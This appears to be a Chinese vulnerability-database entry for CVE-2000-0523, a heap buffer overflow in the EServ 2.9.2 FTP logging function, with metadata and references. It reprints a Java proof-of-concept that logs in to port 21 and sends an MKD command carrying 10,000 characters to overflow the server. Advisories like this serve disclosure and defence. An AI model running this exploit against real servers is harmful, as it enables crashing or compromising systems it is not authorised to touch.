EServ 2.9.2日志记录功能缓冲区溢出漏洞

EServ 2.9.2日志记录功能缓冲区溢出漏洞

漏洞ID 1105825 漏洞类型 缓冲区溢出
发布时间 2000-05-10 更新时间 2005-05-02
图片[1]-EServ 2.9.2日志记录功能缓冲区溢出漏洞-安全小百科CVE编号 CVE-2000-0523
图片[2]-EServ 2.9.2日志记录功能缓冲区溢出漏洞-安全小百科CNNVD-ID CNNVD-200006-025
漏洞平台 Windows CVSS评分 10.0
|漏洞来源
https://www.exploit-db.com/exploits/19997
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200006-025
|漏洞详情
EServ2.9.2和以前的版本中日志记录功能存在缓冲区溢出漏洞。攻击者借助超长MKD命令可以执行任意命令。
|漏洞EXP
source: http://www.securityfocus.com/bid/1315/info

EType EServ is a combination mail, news, HTTP, FTP, and proxy server.

The logging mechanism in EType EServ is vulnerable to a heap buffer overflow that could allow remote attackers to execute arbitrary code on the server. The overflow occurs when a MKD command with an unusually long argument is sent to the FTP Server port. 

/* Proof of concept code for the heap overflow in EServ <= 2.9.2
 * Written 10/05/2000 by Andrew Lewis aka. Wizdumb [MDMA]
 */

import java.io.*;
import java.net.*;

class eservheap {

public static void main(String[] args) throws IOException {

  if (args.length < 1) {
    System.out.println("Syntax: java eservheap [host] <user> <pass>");
    System.exit(1); }

  Socket soq = null;
  PrintWriter white = null;
  BufferedReader weed = null;

  try {
    soq = new Socket(args[0], 21);
    white = new PrintWriter(soq.getOutputStream(), true);
    weed = new BufferedReader(new
InputStreamReader(soq.getInputStream()));
  } catch (Exception e) {
    System.out.println("Problems connecting :-/");
    System.exit(1); }

  weed.readLine();
  String juzer = (args.length == 3) ? ("USER " + args[1]) : "USER
anonymous";
  String pasz =  (args.length == 3) ? ("PASS " + args[2]) : "PASS mdma";
  white.println(juzer + "n" + pasz);
  weed.readLine();
  weed.readLine();

  white.print("MKD ");
  for (int i = 0; i < 10000; i++) white.print("A");
  white.println(); // uNf! Who yoh daddy, bitch?
  weed.readLine();
  white.println("QUIT"); } }
|参考资料

来源:XF
名称:eserv-logging-overflow
链接:http://xforce.iss.net/static/4614.php
来源:BID
名称:1315
链接:http://www.securityfocus.com/bid/1315
来源:BUGTRAQ
名称:20000606MDMAAdvisory#6:EServLoggingHeapOverflowVulnerability
链接:http://archives.neohapsis.com/archives/bugtraq/2000-06/0009.html

相关推荐: Microsoft Commerce Server OWC Package Installer Buffer Overflow Vulnerability

Microsoft Commerce Server OWC Package Installer Buffer Overflow Vulnerability 漏洞ID 1101837 漏洞类型 Boundary Condition Error 发布时间 2002…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享